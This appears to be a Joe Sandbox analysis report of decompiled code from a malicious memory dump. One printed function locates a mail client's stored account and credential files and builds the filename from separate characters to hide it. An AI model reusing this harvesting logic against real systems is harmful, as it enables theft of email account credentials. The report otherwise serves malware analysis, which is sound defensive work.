                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t71 = _a8;
                                                                                                                                                                                                                                                                  				_push(__edi);
                                                                                                                                                                                                                                                                  				_v5 = 0;
                                                                                                                                                                                                                                                                  				_t93 = _t71 + 0x10;
                                                                                                                                                                                                                                                                  				_push(_t93);
                                                                                                                                                                                                                                                                  				_v16 = 1;
                                                                                                                                                                                                                                                                  				_v20 = _t93;
                                                                                                                                                                                                                                                                  				_v12 =  *(_t71 + 8) ^  *0x10013014;
                                                                                                                                                                                                                                                                  				E10003330(__edi, _t93,  *(_t71 + 8) ^  *0x10013014);
                                                                                                                                                                                                                                                                  				E100037A7(_a12);
                                                                                                                                                                                                                                                                  				_t51 = _a4;
                                                                                                                                                                                                                                                                  				_t102 = _t101 + 0xc;
                                                                                                                                                                                                                                                                  				_t90 =  *((intOrPtr*)(_t71 + 0xc));
                                                                                                                                                                                                                                                                  				if(( *(_t51 + 4) & 0x00000066) != 0) {
                                                                                                                                                                                                                                                                  					if(_t90 != 0xfffffffe) {
                                                                                                                                                                                                                                                                  						E10003790(_t71, 0xfffffffe, _t93, 0x10013014);
                                                                                                                                                                                                                                                                  						goto L14;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L15;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v32 = _t51;
                                                                                                                                                                                                                                                                  					_v28 = _a12;
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t71 - 4)) =  &_v32;
                                                                                                                                                                                                                                                                  					if(_t90 == 0xfffffffe) {
                                                                                                                                                                                                                                                                  						L15:
                                                                                                                                                                                                                                                                  						return _v16;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							_t75 = _v12;
                                                                                                                                                                                                                                                                  							_t20 = _t90 + 2; // 0x3
                                                                                                                                                                                                                                                                  							_t58 = _t90 + _t20 * 2;
                                                                                                                                                                                                                                                                  							_t73 =  *((intOrPtr*)(_t75 + _t58 * 4));
                                                                                                                                                                                                                                                                  							_t59 = _t75 + _t58 * 4;
                                                                                                                                                                                                                                                                  							_t76 =  *((intOrPtr*)(_t59 + 4));
                                                                                                                                                                                                                                                                  							_v24 = _t59;
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)(_t59 + 4)) == 0) {
                                                                                                                                                                                                                                                                  								_t77 = _v5;
                                                                                                                                                                                                                                                                  								goto L8;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_t60 = E10003740(_t76, _t93);
                                                                                                                                                                                                                                                                  								_t77 = 1;
                                                                                                                                                                                                                                                                  								_v5 = 1;
                                                                                                                                                                                                                                                                  								_t110 = _t60;
                                                                                                                                                                                                                                                                  								if(_t110 < 0) {
                                                                                                                                                                                                                                                                  									_v16 = 0;
                                                                                                                                                                                                                                                                  									L14:
                                                                                                                                                                                                                                                                  									_push(_t93);
                                                                                                                                                                                                                                                                  									E10003330(_t90, _t93, _v12);
                                                                                                                                                                                                                                                                  									goto L15;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									if(_t110 > 0) {
                                                                                                                                                                                                                                                                  										_t61 = _a4;
                                                                                                                                                                                                                                                                  										if( *_t61 == 0xe06d7363 &&  *0x1000dac8 != 0) {
                                                                                                                                                                                                                                                                  											0x1000bbe0(0x1000dac8);
                                                                                                                                                                                                                                                                  											_t102 = _t102 + 4;
                                                                                                                                                                                                                                                                  											if(_t61 != 0) {
                                                                                                                                                                                                                                                                  												_t97 =  *0x1000dac8; // 0x10003e1c
                                                                                                                                                                                                                                                                  												 *0x1000d12c(_a4, 1);
                                                                                                                                                                                                                                                                  												 *_t97();
                                                                                                                                                                                                                                                                  												_t93 = _v20;
                                                                                                                                                                                                                                                                  												_t102 = _t102 + 8;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											_t61 = _a4;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										E10003774(_a8, _t61);
                                                                                                                                                                                                                                                                  										_t63 = _a8;
                                                                                                                                                                                                                                                                  										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
                                                                                                                                                                                                                                                                  											E10003790(_t63, _t90, _t93, 0x10013014);
                                                                                                                                                                                                                                                                  											_t63 = _a8;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										 *((intOrPtr*)(_t63 + 0xc)) = _t73;
                                                                                                                                                                                                                                                                  										E10003330(_t90, _t93, _v12);
                                                                                                                                                                                                                                                                  										E10003758();
                                                                                                                                                                                                                                                                  										asm("int3");
                                                                                                                                                                                                                                                                  										_t65 =  *0x1000d06c(_v40, _t98, _t93);
                                                                                                                                                                                                                                                                  										if(_t65 != 0) {
                                                                                                                                                                                                                                                                  											_push(_t93);
                                                                                                                                                                                                                                                                  											do {
                                                                                                                                                                                                                                                                  												_t95 =  *_t65;
                                                                                                                                                                                                                                                                  												L100047F0(_t65);
                                                                                                                                                                                                                                                                  												_t65 = _t95;
                                                                                                                                                                                                                                                                  											} while (_t95 != 0);
                                                                                                                                                                                                                                                                  											return _t65;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										return _t65;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										goto L8;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L29;
                                                                                                                                                                                                                                                                  							L8:
                                                                                                                                                                                                                                                                  							_t90 = _t73;
                                                                                                                                                                                                                                                                  						} while (_t73 != 0xfffffffe);
                                                                                                                                                                                                                                                                  						if(_t77 != 0) {
                                                                                                                                                                                                                                                                  							goto L14;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L15;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L29:
                                                                                                                                                                                                                                                                  			}































                                                                                                                                                                                                                                                                  0x10003377
                                                                                                                                                                                                                                                                  0x1000337b
                                                                                                                                                                                                                                                                  0x1000337c
                                                                                                                                                                                                                                                                  0x10003383
                                                                                                                                                                                                                                                                  0x1000338c
                                                                                                                                                                                                                                                                  0x1000338e
                                                                                                                                                                                                                                                                  0x10003395
                                                                                                                                                                                                                                                                  0x10003398
                                                                                                                                                                                                                                                                  0x1000339b
                                                                                                                                                                                                                                                                  0x100033a3
                                                                                                                                                                                                                                                                  0x100033a8
                                                                                                                                                                                                                                                                  0x100033ab
                                                                                                                                                                                                                                                                  0x100033ae
                                                                                                                                                                                                                                                                  0x100033b5
                                                                                                                                                                                                                                                                  0x10003419
                                                                                                                                                                                                                                                                  0x10003428
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10003428
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100033b7
                                                                                                                                                                                                                                                                  0x100033b7
                                                                                                                                                                                                                                                                  0x100033bd
                                                                                                                                                                                                                                                                  0x100033c3
                                                                                                                                                                                                                                                                  0x100033c9
                                                                                                                                                                                                                                                                  0x10003439
                                                                                                                                                                                                                                                                  0x10003442
                                                                                                                                                                                                                                                                  0x100033cb
                                                                                                                                                                                                                                                                  0x100033d0
                                                                                                                                                                                                                                                                  0x100033d0
                                                                                                                                                                                                                                                                  0x100033d3
                                                                                                                                                                                                                                                                  0x100033d6
                                                                                                                                                                                                                                                                  0x100033d9
                                                                                                                                                                                                                                                                  0x100033dc
                                                                                                                                                                                                                                                                  0x100033df
                                                                                                                                                                                                                                                                  0x100033e2
                                                                                                                                                                                                                                                                  0x100033e7
                                                                                                                                                                                                                                                                  0x100033fd
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100033e9
                                                                                                                                                                                                                                                                  0x100033eb
                                                                                                                                                                                                                                                                  0x100033f0
                                                                                                                                                                                                                                                                  0x100033f2
                                                                                                                                                                                                                                                                  0x100033f5
                                                                                                                                                                                                                                                                  0x100033f7
                                                                                                                                                                                                                                                                  0x1000340d
                                                                                                                                                                                                                                                                  0x1000342d
                                                                                                                                                                                                                                                                  0x1000342d
                                                                                                                                                                                                                                                                  0x10003431
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100033f9
                                                                                                                                                                                                                                                                  0x100033f9
                                                                                                                                                                                                                                                                  0x10003443
                                                                                                                                                                                                                                                                  0x1000344c
                                                                                                                                                                                                                                                                  0x1000345c
                                                                                                                                                                                                                                                                  0x10003461
                                                                                                                                                                                                                                                                  0x10003466
                                                                                                                                                                                                                                                                  0x10003468
                                                                                                                                                                                                                                                                  0x10003475
                                                                                                                                                                                                                                                                  0x1000347b
                                                                                                                                                                                                                                                                  0x1000347d
                                                                                                                                                                                                                                                                  0x10003480
                                                                                                                                                                                                                                                                  0x10003480
                                                                                                                                                                                                                                                                  0x10003483
                                                                                                                                                                                                                                                                  0x10003483
                                                                                                                                                                                                                                                                  0x1000348b
                                                                                                                                                                                                                                                                  0x10003490
                                                                                                                                                                                                                                                                  0x10003496
                                                                                                                                                                                                                                                                  0x100034a2
                                                                                                                                                                                                                                                                  0x100034a7
                                                                                                                                                                                                                                                                  0x100034a7
                                                                                                                                                                                                                                                                  0x100034ae
                                                                                                                                                                                                                                                                  0x100034b1
                                                                                                                                                                                                                                                                  0x100034c1
                                                                                                                                                                                                                                                                  0x100034c6
                                                                                                                                                                                                                                                                  0x100034cd
                                                                                                                                                                                                                                                                  0x100034d5
                                                                                                                                                                                                                                                                  0x100034d7
                                                                                                                                                                                                                                                                  0x100034d8
                                                                                                                                                                                                                                                                  0x100034d8
                                                                                                                                                                                                                                                                  0x100034db
                                                                                                                                                                                                                                                                  0x100034e0
                                                                                                                                                                                                                                                                  0x100034e3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100034e7
                                                                                                                                                                                                                                                                  0x100034e9
                                                                                                                                                                                                                                                                  0x100033fb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100033fb
                                                                                                                                                                                                                                                                  0x100033f9
                                                                                                                                                                                                                                                                  0x100033f7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10003400
                                                                                                                                                                                                                                                                  0x10003400
                                                                                                                                                                                                                                                                  0x10003402
                                                                                                                                                                                                                                                                  0x10003409
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000340b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10003409
                                                                                                                                                                                                                                                                  0x100033c9
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$___except_validate_context_record
                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                  • API String ID: 2101322661-1018135373
                                                                                                                                                                                                                                                                  • Opcode ID: a534dbd97931b2ff7564e01db386047b4ff528c9b4fe097729ec76c16dea6e87
                                                                                                                                                                                                                                                                  • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a534dbd97931b2ff7564e01db386047b4ff528c9b4fe097729ec76c16dea6e87
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E100011EA(intOrPtr __ecx, void* __edx) {
                                                                                                                                                                                                                                                                  				char _v46;
                                                                                                                                                                                                                                                                  				short _v48;
                                                                                                                                                                                                                                                                  				short _v50;
                                                                                                                                                                                                                                                                  				short _v52;
                                                                                                                                                                                                                                                                  				short _v54;
                                                                                                                                                                                                                                                                  				short _v56;
                                                                                                                                                                                                                                                                  				short _v58;
                                                                                                                                                                                                                                                                  				short _v60;
                                                                                                                                                                                                                                                                  				short _v62;
                                                                                                                                                                                                                                                                  				short _v64;
                                                                                                                                                                                                                                                                  				short _v66;
                                                                                                                                                                                                                                                                  				char _v68;
                                                                                                                                                                                                                                                                  				short _v1108;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				signed char _t28;
                                                                                                                                                                                                                                                                  				short _t32;
                                                                                                                                                                                                                                                                  				short _t33;
                                                                                                                                                                                                                                                                  				short _t34;
                                                                                                                                                                                                                                                                  				short _t35;
                                                                                                                                                                                                                                                                  				short _t36;
                                                                                                                                                                                                                                                                  				short _t37;
                                                                                                                                                                                                                                                                  				short _t38;
                                                                                                                                                                                                                                                                  				short _t39;
                                                                                                                                                                                                                                                                  				short _t51;
                                                                                                                                                                                                                                                                  				void* _t61;
                                                                                                                                                                                                                                                                  				intOrPtr _t62;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t61 = __edx;
                                                                                                                                                                                                                                                                  				_t62 = __ecx;
                                                                                                                                                                                                                                                                  				E10002C40(__edx,  &_v1108, 0, 0x410);
                                                                                                                                                                                                                                                                  				E10001E89( &_v1108, _t61, "\Data\AccCfg\Accounts.tdat");
                                                                                                                                                                                                                                                                  				_t28 = GetFileAttributesW( &_v1108);
                                                                                                                                                                                                                                                                  				if(_t28 != 0xffffffff && (_t28 & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                  					E1000173A(_t62,  &_v1108);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E10001E89( &_v1108, _t61, "\Storage\");
                                                                                                                                                                                                                                                                  				E100010F1(_t62,  &_v1108, 0, "\Accounts\Account.rec0", 1);
                                                                                                                                                                                                                                                                  				E10001E89( &_v1108, _t61, "\Mail\");
                                                                                                                                                                                                                                                                  				_t32 = 0x41;
                                                                                                                                                                                                                                                                  				_v68 = _t32;
                                                                                                                                                                                                                                                                  				_t33 = 0x63;
                                                                                                                                                                                                                                                                  				_v66 = _t33;
                                                                                                                                                                                                                                                                  				_v64 = _t33;
                                                                                                                                                                                                                                                                  				_t34 = 0x6f;
                                                                                                                                                                                                                                                                  				_v62 = _t34;
                                                                                                                                                                                                                                                                  				_t35 = 0x75;
                                                                                                                                                                                                                                                                  				_v60 = _t35;
                                                                                                                                                                                                                                                                  				_t36 = 0x6e;
                                                                                                                                                                                                                                                                  				_t51 = 0x74;
                                                                                                                                                                                                                                                                  				_v58 = _t36;
                                                                                                                                                                                                                                                                  				_t37 = 0x2e;
                                                                                                                                                                                                                                                                  				_v54 = _t37;
                                                                                                                                                                                                                                                                  				_t38 = 0x73;
                                                                                                                                                                                                                                                                  				_v52 = _t38;
                                                                                                                                                                                                                                                                  				_t39 = 0x67;
                                                                                                                                                                                                                                                                  				_v48 = _t39;
                                                                                                                                                                                                                                                                  				_v56 = _t51;
                                                                                                                                                                                                                                                                  				_v50 = _t51;
                                                                                                                                                                                                                                                                  				E10002C40(_t61,  &_v46, 0, 0x2a);
                                                                                                                                                                                                                                                                  				return E100010F1(_t62,  &_v1108, 0,  &_v68, 1);
                                                                                                                                                                                                                                                                  			}





























                                                                                                                                                                                                                                                                  0x10001203
                                                                                                                                                                                                                                                                  0x10001207
                                                                                                                                                                                                                                                                  0x10001209
                                                                                                                                                                                                                                                                  0x1000121b
                                                                                                                                                                                                                                                                  0x1000122a
                                                                                                                                                                                                                                                                  0x10001233
                                                                                                                                                                                                                                                                  0x10001241
                                                                                                                                                                                                                                                                  0x10001241
                                                                                                                                                                                                                                                                  0x10001253
                                                                                                                                                                                                                                                                  0x10001268
                                                                                                                                                                                                                                                                  0x1000127a
                                                                                                                                                                                                                                                                  0x10001281
                                                                                                                                                                                                                                                                  0x10001284
                                                                                                                                                                                                                                                                  0x10001288
                                                                                                                                                                                                                                                                  0x1000128b
                                                                                                                                                                                                                                                                  0x1000128f
                                                                                                                                                                                                                                                                  0x10001293
                                                                                                                                                                                                                                                                  0x10001296
                                                                                                                                                                                                                                                                  0x1000129a
                                                                                                                                                                                                                                                                  0x1000129d
                                                                                                                                                                                                                                                                  0x100012a1
                                                                                                                                                                                                                                                                  0x100012a4
                                                                                                                                                                                                                                                                  0x100012a7
                                                                                                                                                                                                                                                                  0x100012ab
                                                                                                                                                                                                                                                                  0x100012ae
                                                                                                                                                                                                                                                                  0x100012b2
                                                                                                                                                                                                                                                                  0x100012b5
                                                                                                                                                                                                                                                                  0x100012b9
                                                                                                                                                                                                                                                                  0x100012bc
                                                                                                                                                                                                                                                                  0x100012c5
                                                                                                                                                                                                                                                                  0x100012c9
                                                                                                                                                                                                                                                                  0x100012cd
                                                                                                                                                                                                                                                                  0x100012ed

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                                                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                                                  • API String ID: 4036392271-1520055953
                                                                                                                                                                                                                                                                  • Opcode ID: ff01a79801e64d1dadea51ed48f49b54a252686542ff8c81baa63f58bb636154
                                                                                                                                                                                                                                                                  • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff01a79801e64d1dadea51ed48f49b54a252686542ff8c81baa63f58bb636154
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                                                                                                                  			E10001F45(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                                                  				void* _t45;
                                                                                                                                                                                                                                                                  				void* _t47;
                                                                                                                                                                                                                                                                  				void* _t53;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t47 = __ecx;
                                                                                                                                                                                                                                                                  				_t45 = __ebx;
                                                                                                                                                                                                                                                                  				asm("adc al, ch");
                                                                                                                                                                                                                                                                  				if(__eflags == 0) {
                                                                                                                                                                                                                                                                  					 *__eax =  *__eax + __eax;
                                                                                                                                                                                                                                                                  					E1000247C(__ecx, __edx, 0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				 *((intOrPtr*)(_t47 - 0x7c)) =  *((intOrPtr*)(_t47 - 0x7c)) + _t45;
                                                                                                                                                                                                                                                                  				 *(_t53 + 7) =  *(_t53 + 7) << 0x33;
                                                                                                                                                                                                                                                                  			}






                                                                                                                                                                                                                                                                  0x10001f45
                                                                                                                                                                                                                                                                  0x10001f45
                                                                                                                                                                                                                                                                  0x10001f45
                                                                                                                                                                                                                                                                  0x10001f47
                                                                                                                                                                                                                                                                  0x10001f49
                                                                                                                                                                                                                                                                  0x10001f4d
                                                                                                                                                                                                                                                                  0x10001f4d
                                                                                                                                                                                                                                                                  0x10001f51
                                                                                                                                                                                                                                                                  0x10001f54

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __RTC_Initialize.LIBCMT ref: 10001F8F
                                                                                                                                                                                                                                                                  • ___scrt_initialize_default_local_stdio_options.LIBCMT ref: 10001F99
                                                                                                                                                                                                                                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10001FFD
                                                                                                                                                                                                                                                                    • Part of subcall function 1000247C: ___isa_available_init.LIBCMT ref: 1000248C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Initialize___isa_available_init___scrt_initialize_default_local_stdio_options___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                                  • String ID: 3
                                                                                                                                                                                                                                                                  • API String ID: 236661243-1842515611
                                                                                                                                                                                                                                                                  • Opcode ID: f12f5dac8e013a99b4c513464638db41835c9c79540b382c9c2e2d8559fdf8c9
                                                                                                                                                                                                                                                                  • Instruction ID: 84a1dc9a44cb4f0ed1fe1617209f1d7e5434a6b7c983ec785d4284467ce8f5b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f12f5dac8e013a99b4c513464638db41835c9c79540b382c9c2e2d8559fdf8c9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E21257A509392AEFB01EB709C557EC3BE1CF022E8F10805AF584570DBDF356689C666
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?), ref: 10004B59
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?), ref: 10004B8F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                  • Opcode ID: d91ca0eb3122b760f07fdd71673c19b0dcb1886c683dffdfc4d4ccf7c61baf39
                                                                                                                                                                                                                                                                  • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d91ca0eb3122b760f07fdd71673c19b0dcb1886c683dffdfc4d4ccf7c61baf39
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                                                                                                                  			E10007153() {
                                                                                                                                                                                                                                                                  				int _v8;
                                                                                                                                                                                                                                                                  				void* __ecx;
                                                                                                                                                                                                                                                                  				void* _t6;
                                                                                                                                                                                                                                                                  				int _t7;
                                                                                                                                                                                                                                                                  				char* _t13;
                                                                                                                                                                                                                                                                  				int _t17;
                                                                                                                                                                                                                                                                  				void* _t19;
                                                                                                                                                                                                                                                                  				char* _t25;
                                                                                                                                                                                                                                                                  				WCHAR* _t27;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t27 = GetEnvironmentStringsW();
                                                                                                                                                                                                                                                                  				if(_t27 == 0) {
                                                                                                                                                                                                                                                                  					L7:
                                                                                                                                                                                                                                                                  					_t13 = 0;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t6 = E1000711C(_t27);
                                                                                                                                                                                                                                                                  					_pop(_t19);
                                                                                                                                                                                                                                                                  					_t17 = _t6 - _t27 >> 1;
                                                                                                                                                                                                                                                                  					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  					_v8 = _t7;
                                                                                                                                                                                                                                                                  					if(_t7 == 0) {
                                                                                                                                                                                                                                                                  						goto L7;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_t25 = E100056D0(_t19, _t7);
                                                                                                                                                                                                                                                                  						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                                                                                                                                                                                                                                  							_t13 = 0;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t13 = _t25;
                                                                                                                                                                                                                                                                  							_t25 = 0;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E1000571E(_t25);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_t27 != 0) {
